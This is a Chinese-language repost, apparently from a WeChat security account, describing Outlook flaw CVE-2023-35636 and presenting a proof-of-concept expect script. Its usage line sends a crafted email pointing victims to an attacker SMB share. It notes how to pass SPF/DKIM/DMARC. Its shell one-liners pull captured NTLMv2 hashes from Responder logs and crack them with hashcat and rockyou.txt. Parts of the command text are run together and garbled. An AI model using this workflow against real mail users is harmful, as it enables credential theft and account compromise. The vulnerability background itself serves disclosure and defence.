Varonis 威胁实验室最近在其研究中发现了一项新的 Outlook 漏洞(CVE-2023-35636),该漏洞利用了 Outlook、Windows 性能分析器(WPA)和 Windows 文件资源管理器来获取 NTLM v2 哈希密码。攻击者通过这些密码的获取,可以尝试进行离线暴力攻击或进行身份验证中继攻击,以破坏用户账户并获取未授权的访问权限。
Varonis 威胁实验室的使命是不断发现新型数据暴露方式,并协助构建安全解决方案,以便检测和阻止潜在威胁。我们已于2023年7月向 Microsoft 报告了这些漏洞及其利用方式。在随后的更新中,Microsoft 将 WPA 和 Windows 文件资源管理器的漏洞评级为“中等严重性”,而 Outlook 漏洞被分类为“重要”(CVE-2023-35636),评级为“重要”。截至2023年12月12日,Microsoft 已发布了相应的 CVE 补丁。
尚未安装补丁的系统仍然容易受到威胁行为者的攻击,这些攻击者可能试图利用以下方法来窃取 NTLM v2 哈希密码。
-
那么,CVE-2023-35636 是什么?
CVE-2023-35636 是一项利用 Microsoft Outlook 中的日历共享功能的漏洞。攻击者通过在电子邮件中添加特定标头,指示 Outlook 共享内容并联系特定计算机,从而创造了截获 NTLM v2 哈希的机会。
-
而什么是 NTLM v2?
NTLM v2 是 Microsoft Windows 用于对远程服务器上的用户进行身份验证的加密协议。尽管 NTLM v2 是原始 NTLM 的更安全版本,但它仍然容易受到离线暴力破解和身份验证中继攻击的影响。
NTLM v2 协议的一部分涉及以散列形式安全传输密码。密码散列使用加密算法将您的密码转换为短字符串,由字母和/或数字组成。由于不涉及加盐(向密码添加随机值以防止预先计算哈希表),因此这些哈希值与密码等效。这意味着如果攻击者获取到哈希值,他们可以在不知道实际密码的情况下进行身份验证。
Microsoft Outlook 信息泄露漏洞(泄露密码哈希)- Expect Script POC
CVE-2023-35636 利用 Microsoft Outlook 中的日历共享功能,通过在电子邮件中添加两个标头来指示 Outlook 共享内容并联系指定计算机,从而创造拦截 NTLM v2 哈希的机会。
1.在 SMB 服务器上运行响应程序
2.发送电子邮件并等待
使用方法:
./cve-2023-35636.sh mx.fqdn port email_sender email_recipient smb_share例如:
./cve-2023-35636.sh mail.mydomain.com 25 [email protected] [email protected] \\x.x.x.x\mycalendar.ics (请记得添加所有的\)
注意事项:chmod +x cve-2023-35636.sh
要求应用程序expect
需要合法的 IP 发送者和电子邮件发送者(以通过 SPF、DKIM、DMARC)
如果接收方用户点击小日历图标.. 瞬间,IP/用户(明文)和密码哈希(NTLM-v2-SSP)将发送到您的响应 IP。
然后,您可以尝试使用hashcat/john the ripper来破解密码:
strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'echo "[*] 搜索: $user";
strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txtdone
hashcat -a 0 -m 5600 ntlm-hashes.txt rockyou.txt -o cracked.txt -O这段代码的作用是从 Responder-Session.log 中提取 NTLMv2-SSP 哈希,然后使用 hashcat 尝试使用 rockyou.txt 字典文件破解密码。
项目地址:
https://github.com/duy-31/CVE-2023-35636?tab=readme-ov-file
原文始发于微信公众号(Ots安全):Microsoft Outlook 信息泄露漏洞(泄露密码哈希)- Expect Script POC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论